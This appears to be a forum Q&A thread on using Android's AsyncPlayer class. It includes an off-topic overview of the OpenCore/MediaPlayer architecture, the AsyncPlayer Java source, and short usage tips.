How should the android.media.AsyncPlayer class be used?

2025-02-12 20:42:06
Recommended answers (4)
Answer 1:

  Code layout:

  The OpenCore code lives in the external/opencore directory of the Android source tree. This is OpenCore's root directory, and it contains the following subdirectories:

  android: an upper-level library that implements the audio/video capture and playback interfaces used by Android, plus the DRM (digital rights management) interface.

  baselibs: low-level libraries for data structures, thread safety, and similar concerns.

  codecs_v2: the audio/video codecs, implemented on top of OpenMAX.

  engines: the core part, the implementation of the multimedia engines.

  extern_libs_v2: the Khronos OpenMAX header files.

  fileformats: file-format parsing (parser) utilities.

  nodes: PVMF nodes, mainly for codecs and file parsing.

  oscl: the operating-system compatibility library.

  pvmi: abstract interfaces for input/output control.

  protocols: network-related content, chiefly the RTSP, RTP, and HTTP protocols.

  pvcommon: the Android.mk file for the pvcommon library; no source files.

  pvplayer: the Android.mk file for the pvplayer library; no source files.

  pvauthor: the Android.mk file for the pvauthor library; no source files.

  tools_v2: build tools and some registrable modules.

  This article mainly describes the architecture of Android's MediaPlayer, which is implemented by PV Player inside OpenCore.

  1. Overview

  Android's MediaPlayer provides both audio and video playback; the Music and Video applications are both built on MediaPlayer.

  The code is mainly distributed across the following directories:

  Java application path:

  packages/apps/Music/src/com/android/music/

  Java class path:

  frameworks/base/media/java/android/media/MediaPlayer.java

  Java native call (JNI) layer:

  frameworks/base/media/jni/android_media_MediaPlayer.cpp

  compiled into libmedia_jni.so

  Header files:

  frameworks/base/include/media/

  Multimedia library:

  frameworks/base/media/libmedia/

  compiled into libmedia.so

  Multimedia service:

  frameworks/base/media/libmediaplayerservice/

  compiled into libmediaplayerservice.so

  Concrete implementation:

  external/opencore/

  compiled into libopencoreplayer.so

  libopencoreplayer.so is the main implementation; the other libraries are essentially wrappers built on top of it, plus the machinery for inter-process communication.

  2. Framework

  Among these libraries, libmedia.so sits at the core. The interface it exposes to the upper layers is primarily the MediaPlayer class; libmedia_jni.so provides the Java-facing interface by calling the MediaPlayer class, and implements the android.media.MediaPlayer Java class.

  libmediaplayerservice.so is the media server. It implements the server side by deriving from classes in libmedia.so, while another part of libmedia.so talks to libmediaplayerservice.so via inter-process communication. The real work of libmediaplayerservice.so is done by calling into PV Player.

  The MediaPlayer headers live in frameworks/base/include/media/, the directory corresponding to the libmedia.so sources in frameworks/base/media/libmedia/. The main headers are:

  IMediaPlayer.h

  IMediaPlayerClient.h

  IMediaPlayerService.h

  mediaplayer.h

  MediaPlayerInterface.h

  mediaplayer.h provides the interface to the upper layers, while the other headers define interface classes (classes containing pure virtual functions); these interface classes must be inherited by implementation classes before they can be used.

  The relationships among the MediaPlayer libraries and their call paths are shown in the figure below:

  (Figure: MediaPlayer library and call relationships; image not preserved.)

  At run time the system splits roughly into a Client part and a Server part, running in two separate processes and using the Binder mechanism for IPC. Structurally, the three headers IMediaPlayerService.h, IMediaPlayerClient.h, and mediaplayer.h define the MediaPlayer interfaces and architecture; MediaPlayerService.cpp and mediaplayer.cpp implement that architecture; and the concrete functionality is implemented in PVPlayer (the libopencoreplayer.so library).
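The client/proxy vs. server/stub split described above can be sketched in plain Java. This is a toy model only (IPlayer, PlayerStub, and PlayerProxy are illustrative names, not Android APIs); in Android the call really crosses a process boundary through the Binder driver rather than a function reference:

```java
import java.util.function.Function;

// A toy model of the Binder Bn/Bp split: the client holds a proxy that
// turns calls into numbered "transactions"; the server-side stub
// dispatches on the transaction code and runs the real implementation.
interface IPlayer {
    int getDuration();
}

// Server-side stub, playing the role of BnMediaPlayer.
class PlayerStub implements IPlayer {
    @Override public int getDuration() { return 120000; } // the real work

    // Dispatch by transaction code, like BnMediaPlayer::onTransact.
    int onTransact(int code) {
        if (code == 1) return getDuration();
        throw new IllegalArgumentException("unknown code " + code);
    }
}

// Client-side proxy, playing the role of BpMediaPlayer: it forwards
// each call across the "binder" boundary instead of doing the work.
class PlayerProxy implements IPlayer {
    private final Function<Integer, Integer> binder;
    PlayerProxy(Function<Integer, Integer> binder) { this.binder = binder; }
    @Override public int getDuration() { return binder.apply(1); }
}
```

The caller only ever sees the IPlayer interface, which is why the MediaPlayer client code can stay unaware of which process actually services its calls.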

  2.1 IMediaPlayerClient.h

  Describes the interface of a MediaPlayer client:

  class IMediaPlayerClient: public IInterface

  {

  public:

  DECLARE_META_INTERFACE(MediaPlayerClient);

  virtual void notify(int msg, int ext1, int ext2) = 0;

  };

  class BnMediaPlayerClient: public BnInterface<IMediaPlayerClient>

  {

  public:

  virtual status_t onTransact( uint32_t code,

  const Parcel& data,

  Parcel* reply,

  uint32_t flags = 0);

  };

  In this definition, IMediaPlayerClient inherits IInterface and defines the interface of a MediaPlayer client, while BnMediaPlayerClient inherits BnInterface<IMediaPlayerClient>; this is built to support inter-process communication on top of Android's basic Binder mechanism. In fact, according to the definition of the BnInterface class template, BnMediaPlayerClient effectively inherits from both the native Binder base class and IMediaPlayerClient, a pattern commonly used throughout Android.

  2.2 mediaplayer.h

  The externally facing interface class; its main job is to define the MediaPlayer class:

  class MediaPlayer : public BnMediaPlayerClient

  {

  public:

  MediaPlayer();

  ~MediaPlayer();

  void onFirstRef();

  void disconnect();

  status_t setDataSource(const char *url);

  status_t setDataSource(int fd, int64_t offset, int64_t length);

  status_t setVideoSurface(const sp<Surface>& surface);

  status_t setListener(const sp<MediaPlayerListener>& listener);

  status_t prepare();

  status_t prepareAsync();

  status_t start();

  status_t stop();

  status_t pause();

  bool isPlaying();

  status_t getVideoWidth(int *w);

  status_t getVideoHeight(int *h);

  status_t seekTo(int msec);

  status_t getCurrentPosition(int *msec);

  status_t getDuration(int *msec);

  status_t reset();

  status_t setAudioStreamType(int type);

  status_t setLooping(int loop);

  status_t setVolume(float leftVolume, float rightVolume);

  void notify(int msg, int ext1, int ext2);

  static sp<IMemory> decode(const char* url, uint32_t *pSampleRate, int* pNumChannels);

  static sp<IMemory> decode(int fd, int64_t offset, int64_t length, uint32_t *pSampleRate, int* pNumChannels);

  // ...

  };

  As this interface shows, the MediaPlayer class implements exactly the basic operations of a media player, such as play (start), stop, and pause.

  Another class, DeathNotifier, is defined inside the MediaPlayer class; it inherits the DeathRecipient class nested in IBinder:

  class DeathNotifier: public IBinder::DeathRecipient

  {

  public:

  DeathNotifier() {}

  virtual ~DeathNotifier();

  virtual void binderDied(const wp<IBinder>& who);

  };

  In fact, the MediaPlayer class indirectly inherits IBinder, and MediaPlayer::DeathNotifier inherits IBinder::DeathRecipient; both are built to support inter-process communication.

  2.3 IMediaPlayer.h

  Its main content is an interface for implementing the MediaPlayer functionality:

  class IMediaPlayer: public IInterface

  {

  public:

  DECLARE_META_INTERFACE(MediaPlayer);

  virtual void disconnect() = 0;

  virtual status_t setVideoSurface(const sp<ISurface>& surface) = 0;

  virtual status_t prepareAsync() = 0;

  virtual status_t start() = 0;

  virtual status_t stop() = 0;

  virtual status_t pause() = 0;

  virtual status_t isPlaying(bool* state) = 0;

  virtual status_t getVideoSize(int* w, int* h) = 0;

  virtual status_t seekTo(int msec) = 0;

  virtual status_t getCurrentPosition(int* msec) = 0;

  virtual status_t getDuration(int* msec) = 0;

  virtual status_t reset() = 0;

  virtual status_t setAudioStreamType(int type) = 0;

  virtual status_t setLooping(int loop) = 0;

  virtual status_t setVolume(float leftVolume, float rightVolume) = 0;

  };

  class BnMediaPlayer: public BnInterface<IMediaPlayer>

  {

  public:

  virtual status_t onTransact( uint32_t code,

  const Parcel& data,

  Parcel* reply,

  uint32_t flags = 0);

  };

  The IMediaPlayer class mainly defines the functional interface of a MediaPlayer; it must be subclassed before it can be used. Note that although these interfaces resemble those of the MediaPlayer class, the two have no direct relationship. In fact, the various implementations of the MediaPlayer class generally do their work by calling an implementation of the IMediaPlayer class.
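That "similar interface, no inheritance" relationship is just delegation: MediaPlayer holds an IMediaPlayer and forwards each call to it. A minimal plain-Java sketch of the same shape (IPlayerOps, PlayerFacade, and the NO_INIT value are illustrative, not Android APIs):

```java
// A facade in the style of MediaPlayer: it mirrors the operations of an
// IMediaPlayer-like interface without inheriting it, and forwards every
// call to whichever implementation is currently attached.
interface IPlayerOps {
    int start(); // returns a status code; 0 means OK
    int stop();
}

class PlayerFacade {
    static final int OK = 0;
    static final int NO_INIT = -19; // illustrative "not initialized" status

    private IPlayerOps remote; // set once the service has created a player

    void attach(IPlayerOps r) { remote = r; }

    // Each facade method null-checks the delegate, then forwards the call.
    int start() { return remote == null ? NO_INIT : remote.start(); }
    int stop()  { return remote == null ? NO_INIT : remote.stop(); }
}
```

Calling start() before a delegate is attached fails with a status code instead of crashing, which mirrors how the framework reports errors through status_t rather than exceptions.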

  2.4 IMediaPlayerService.h

  Describes a MediaPlayer service, defined as follows:

  class IMediaPlayerService: public IInterface

  {

  public:

  DECLARE_META_INTERFACE(MediaPlayerService);

  virtual sp<IMediaPlayer> create(pid_t pid, const sp<IMediaPlayerClient>& client, const char* url) = 0;

  virtual sp<IMediaPlayer> create(pid_t pid, const sp<IMediaPlayerClient>& client, int fd, int64_t offset, int64_t length) = 0;

  virtual sp<IMemory> decode(const char* url, uint32_t *pSampleRate, int* pNumChannels) = 0;

  virtual sp<IMemory> decode(int fd, int64_t offset, int64_t length, uint32_t *pSampleRate, int* pNumChannels) = 0;

  };

  class BnMediaPlayerService: public BnInterface<IMediaPlayerService>

  {

  public:

  virtual status_t onTransact( uint32_t code,

  const Parcel& data,

  Parcel* reply,

  uint32_t flags = 0);

  };

  Because they contain pure virtual functions, IMediaPlayerService and BnMediaPlayerService must be subclassed and implemented before use; the create and decode interfaces declared in IMediaPlayerService are exactly what the subclasses must implement. Note that the return type of create is sp<IMediaPlayer>, and this IMediaPlayer is precisely the interface that provides the player functionality.

  3. Implementation

  3.1 App

  The file MediaPlaybackService.java under packages/apps/Music/src/com/android/music/ contains the calls to MediaPlayer.

  MediaPlaybackService.java imports the class:

  import android.media.MediaPlayer;

  Inside the MediaPlaybackService class, a MultiPlayer class is defined:

  private class MultiPlayer {

  private MediaPlayer mMediaPlayer = new MediaPlayer();

  }

  The MultiPlayer class uses the MediaPlayer class; some of its calls into this MediaPlayer proceed as follows:

  mMediaPlayer.reset();

  mMediaPlayer.setDataSource(path);

  mMediaPlayer.setAudioStreamType(AudioManager.STREAM_MUSIC);

  Interfaces such as reset, setDataSource, and setAudioStreamType are implemented through Java Native Interface (JNI) calls.

  3.2 JNI

  This layer is implemented in frameworks/base/media/jni/android_media_MediaPlayer.cpp; the android_media_MediaPlayer_reset function, for example, is implemented as follows:

  static void android_media_MediaPlayer_reset(JNIEnv *env, jobject thiz)

  {

  sp<MediaPlayer> mp = getMediaPlayer(env, thiz);

  if (mp == NULL ) {

  jniThrowException(env, "java/lang/IllegalStateException", NULL);

  return;

  }

  process_media_player_call( env, thiz, mp->reset(), NULL, NULL );

  }

  It first obtains a MediaPlayer pointer and then performs the actual work by calling through it.

  register_android_media_MediaPlayer registers the native methods in gMethods onto the class "android/media/MediaPlayer"; its implementation is shown below.

  static int register_android_media_MediaPlayer(JNIEnv *env)

  {

  jclass clazz;

  clazz = env->FindClass("android/media/MediaPlayer");

  // ......

  return AndroidRuntime::registerNativeMethods(env, "android/media/MediaPlayer", gMethods, NELEM(gMethods));

  }

  "android/media/MediaPlayer" corresponds to the Java class android.media.MediaPlayer.

  3.3 libmedia.so

  The file frameworks/base/media/libmedia/mediaplayer.cpp implements the interfaces declared in mediaplayer.h; one important fragment is shown below:

  const sp<IMediaPlayerService>& MediaPlayer::getMediaPlayerService()

  {

  Mutex::Autolock _l(mServiceLock);

  if (mMediaPlayerService.get() == 0) {

  sp<IServiceManager> sm = defaultServiceManager();

  sp<IBinder> binder;

  do {

  binder = sm->getService(String16("media.player"));

  if (binder != 0)

  break;

  LOGW("MediaPlayerService not published, waiting...");

  usleep(500000); // 0.5 s

  } while(true);

  if (mDeathNotifier == NULL) {

  mDeathNotifier = new DeathNotifier();

  }

  binder->linkToDeath(mDeathNotifier);

  mMediaPlayerService = interface_cast<IMediaPlayerService>(binder);

  }

  LOGE_IF(mMediaPlayerService==0, "no MediaPlayerService!?");

  return mMediaPlayerService;

  }

  The most important point here is the call binder = sm->getService(String16("media.player"));, which looks up the service named "media.player". The call returns a value of type IBinder, which the implementation then casts to IMediaPlayerService for use.
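The lookup loop above is a generic "poll until the service is published" pattern. A plain-Java sketch of the same idea (ServiceWaiter is an illustrative name; a maxAttempts bound is added here so the sketch can terminate, whereas the C++ code retries forever):

```java
import java.util.function.Supplier;

// Generalized form of the getMediaPlayerService() retry loop: poll a
// lookup function until it yields a service, sleeping between attempts
// the way the native code calls usleep(500000).
class ServiceWaiter {
    static <T> T waitFor(Supplier<T> lookup, long sleepMillis, int maxAttempts)
            throws InterruptedException {
        for (int i = 0; i < maxAttempts; i++) {
            T service = lookup.get();
            if (service != null) return service; // published: done
            Thread.sleep(sleepMillis);           // not yet; wait and retry
        }
        return null; // gave up after maxAttempts tries
    }
}
```

Because the result is cached in mMediaPlayerService, this wait is only paid on the first call; later calls return the cached binder proxy immediately.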

  A concrete function, setDataSource, looks like this:

  status_t MediaPlayer::setDataSource(const char *url)

  {

  LOGV("setDataSource(%s)", url);

  status_t err = UNKNOWN_ERROR;

  if (url != NULL) {

  const sp<IMediaPlayerService>& service(getMediaPlayerService());

  if (service != 0) {

  sp<IMediaPlayer> player(service->create(getpid(), this, url));

  err = setDataSource(player);

  }

  }

  return err;

  }

Answer 2:

AsyncPlayer is basically just a wrapper around MediaPlayer, so you can try using MediaPlayer directly.
MediaPlayer has a setNextMediaPlayer method, which lets playback continue to the next item once the current one finishes.
The source code of the AsyncPlayer class is as follows:

Java code:
/**
* Plays a series of audio URIs, but does all the hard work on another thread
* so that any slowness with preparing or loading doesn't block the calling thread.
*/
public class AsyncPlayer {
private static final int PLAY = 1;
private static final int STOP = 2;
private static final boolean mDebug = false;

private static final class Command {
int code;
Context context;
Uri uri;
boolean looping;
int stream;
long requestTime;

public String toString() {
return "{ code=" + code + " looping=" + looping + " stream=" + stream
+ " uri=" + uri + " }";
}
}

private final LinkedList<Command> mCmdQueue = new LinkedList<Command>();

private void startSound(Command cmd) {
// Preparing can be slow, so if there is something else
// is playing, let it continue until we're done, so there
// is less of a glitch.
try {
if (mDebug) Log.d(mTag, "Starting playback");
MediaPlayer player = new MediaPlayer();
player.setAudioStreamType(cmd.stream);
player.setDataSource(cmd.context, cmd.uri);
player.setLooping(cmd.looping);
player.prepare();
player.start();
if (mPlayer != null) {
mPlayer.release();
}
mPlayer = player;
long delay = SystemClock.uptimeMillis() - cmd.requestTime;
if (delay > 1000) {
Log.w(mTag, "Notification sound delayed by " + delay + "msecs");
}
}
catch (Exception e) {
Log.w(mTag, "error loading sound for " + cmd.uri, e);
}
}

private final class Thread extends java.lang.Thread {
Thread() {
super("AsyncPlayer-" + mTag);
}

public void run() {
while (true) {
Command cmd = null;

synchronized (mCmdQueue) {
if (mDebug) Log.d(mTag, "RemoveFirst");
cmd = mCmdQueue.removeFirst();
}

switch (cmd.code) {
case PLAY:
if (mDebug) Log.d(mTag, "PLAY");
startSound(cmd);
break;
case STOP:
if (mDebug) Log.d(mTag, "STOP");
if (mPlayer != null) {
long delay = SystemClock.uptimeMillis() - cmd.requestTime;
if (delay > 1000) {
Log.w(mTag, "Notification stop delayed by " + delay + "msecs");
}
mPlayer.stop();
mPlayer.release();
mPlayer = null;
} else {
Log.w(mTag, "STOP command without a player");
}
break;
}

synchronized (mCmdQueue) {
if (mCmdQueue.size() == 0) {
// nothing left to do, quit
// doing this check after we're done prevents the case where they
// added it during the operation from spawning two threads and
// trying to do them in parallel.
mThread = null;
releaseWakeLock();
return;
}
}
}
}
}

private String mTag;
private Thread mThread;
private MediaPlayer mPlayer;
private PowerManager.WakeLock mWakeLock;

// The current state according to the caller. Reality lags behind
// because of the asynchronous nature of this class.
private int mState = STOP;

/**
* Construct an AsyncPlayer object.
*
* @param tag a string to use for debugging
*/
public AsyncPlayer(String tag) {
if (tag != null) {
mTag = tag;
} else {
mTag = "AsyncPlayer";
}
}

/**
* Start playing the sound. It will actually start playing at some
* point in the future. There are no guarantees about latency here.
* Calling this before another audio file is done playing will stop
* that one and start the new one.
*
* @param context Your application's context.
* @param uri The URI to play. (see {@link MediaPlayer#setDataSource(Context, Uri)})
* @param looping Whether the audio should loop forever.
* (see {@link MediaPlayer#setLooping(boolean)})
* @param stream the AudioStream to use.
* (see {@link MediaPlayer#setAudioStreamType(int)})
*/
public void play(Context context, Uri uri, boolean looping, int stream) {
Command cmd = new Command();
cmd.requestTime = SystemClock.uptimeMillis();
cmd.code = PLAY;
cmd.context = context;
cmd.uri = uri;
cmd.looping = looping;
cmd.stream = stream;
synchronized (mCmdQueue) {
enqueueLocked(cmd);
mState = PLAY;
}
}

/**
* Stop a previously played sound. It can't be played again or unpaused
* at this point. Calling this multiple times has no ill effects.
*/
public void stop() {
synchronized (mCmdQueue) {
// This check allows stop to be called multiple times without starting
// a thread that ends up doing nothing.
if (mState != STOP) {
Command cmd = new Command();
cmd.requestTime = SystemClock.uptimeMillis();
cmd.code = STOP;
enqueueLocked(cmd);
mState = STOP;
}
}
}

private void enqueueLocked(Command cmd) {
mCmdQueue.add(cmd);
if (mThread == null) {
acquireWakeLock();
mThread = new Thread();
mThread.start();
}
}

/**
* We want to hold a wake lock while we do the prepare and play. The stop probably is
* optional, but it won't hurt to have it too. The problem is that if you start a sound
* while you're holding a wake lock (e.g. an alarm starting a notification), you want the
* sound to play, but if the CPU turns off before mThread gets to work, it won't. The
* simplest way to deal with this is to make it so there is a wake lock held while the
* thread is starting or running. You're going to need the WAKE_LOCK permission if you're
* going to call this.
*
* This must be called before the first time play is called.
*
* @hide
*/
public void setUsesWakeLock(Context context) {
if (mWakeLock != null || mThread != null) {
// if either of these has happened, we've already played something.
// and our releases will be out of sync.
throw new RuntimeException("assertion failed mWakeLock=" + mWakeLock
+ " mThread=" + mThread);
}
PowerManager pm = (PowerManager)context.getSystemService(Context.POWER_SERVICE);
mWakeLock = pm.newWakeLock(PowerManager.PARTIAL_WAKE_LOCK, mTag);
}

private void acquireWakeLock() {
if (mWakeLock != null) {
mWakeLock.acquire();
}
}

private void releaseWakeLock() {
if (mWakeLock != null) {
mWakeLock.release();
}
}
}
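The interesting part of that source is the threading pattern: callers only enqueue Command objects, and a single worker thread is started lazily and lets itself die once the queue drains. The same pattern in miniature, as a self-contained sketch (LazyWorkerQueue is an illustrative name, not part of Android):

```java
import java.util.LinkedList;

// AsyncPlayer's threading pattern in miniature: enqueue() corresponds to
// enqueueLocked(), and the isEmpty() check in drain() corresponds to the
// size()==0 "nothing left to do, quit" check in AsyncPlayer's run() loop.
class LazyWorkerQueue {
    private final LinkedList<Runnable> cmdQueue = new LinkedList<>();
    private Thread worker;

    synchronized void enqueue(Runnable cmd) {
        cmdQueue.add(cmd);
        if (worker == null) {              // no worker running: start one lazily
            worker = new Thread(this::drain, "LazyWorkerQueue");
            worker.start();
        }
    }

    private void drain() {
        while (true) {
            Runnable cmd;
            synchronized (this) {
                if (cmdQueue.isEmpty()) {  // queue drained: let the thread die
                    worker = null;         // the next enqueue() spawns a new one
                    return;
                }
                cmd = cmdQueue.removeFirst();
            }
            cmd.run();                     // slow work runs off the caller's thread
        }
    }
}
```

Doing the quit check and the `worker = null` reset inside the same synchronized block is what prevents the race AsyncPlayer's comment mentions, where a command enqueued mid-drain could otherwise spawn a second parallel worker.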

Answer 3:

To play music from the SD card, call mMediaPlayer.setDataSource("/sdcard/...") to set the path of the file to play, then call start(), stop(), and pause() to start, stop, and pause playback. If the audio is bundled with the application itself (such as in-game sound effects), it is not music on the SD card.

Answer 4:

Hi — Command is just an internal class that AsyncPlayer uses to bundle up its parameters; there is no need for you to study it.
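To answer the original question directly: you construct an AsyncPlayer with a debug tag and then just call play() and stop(). A rough usage sketch follows. Note the caveats: AsyncPlayer is an internal (@hide) class in many Android releases, so it may not be reachable through the public SDK; the Context, Uri, and class names here are placeholders; and on newer API levels the (Context, Uri, boolean, int) overload of play() shown in the source above was superseded by one taking AudioAttributes.

```java
import android.content.Context;
import android.media.AsyncPlayer;
import android.media.AudioManager;
import android.net.Uri;

// Sketch only: assumes an Android Context and a content/file Uri that
// MediaPlayer can open. All prepare()/start() work happens on
// AsyncPlayer's background thread, so these calls return immediately.
public class AlertSound {
    private final AsyncPlayer player = new AsyncPlayer("AlertSound"); // tag used in log messages

    public void ring(Context context, Uri soundUri) {
        // looping=true repeats the sound until stop() is called.
        player.play(context, soundUri, true, AudioManager.STREAM_NOTIFICATION);
    }

    public void silence() {
        player.stop(); // calling stop() multiple times is harmless
    }
}
```

If you also need playback to survive the CPU sleeping (e.g. an alarm), call setUsesWakeLock(context) once before the first play(), and declare the WAKE_LOCK permission, as the comment in the source above explains.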
